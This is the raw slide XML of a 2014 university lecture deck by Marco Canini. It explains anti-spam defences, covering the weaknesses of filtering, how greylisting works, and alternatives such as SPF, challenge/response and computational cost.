              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not detect variant of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require computation and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bandwidth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>negative</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Greylisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic idea: block a mail if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sender’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abnormal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The recipient server manages a database that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>contains “triplet” for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>each incoming mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The IP address of the connecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sender address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>recipient address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The database is a kind of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>white </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Greylisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the server receives a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mail, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it checks whether it already belongs to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If not, the mail is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>greylisted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for a short time and an error message is returned to the sender </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the sender server is compliant with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RFC2821</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it should retry the transmission after at least 30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>minutes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>greylisted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mail is then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>unblocked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No or few false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>negative</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delays due to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>greylisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>solutions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registered computers/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Designate the machines allowed to send e-mail with a sender address originating in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>standard is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Sender </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Framework (SPF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esponse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>User must answer to a challenge to be added to the white </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding cost to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>emails</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Computer must carry out computation to send an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Delegate: use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>gmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>At UCL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1443335"/>
            <a:ext cx="5168900" cy="4673600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="6091535"/>
            <a:ext cx="7210553" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.uclouvain.be/12703.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>| More: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.uclouvain.be/7489.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
            </a:endParaRPr>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23" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="fr-CH"/>
              <a:t>Introduction to Spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
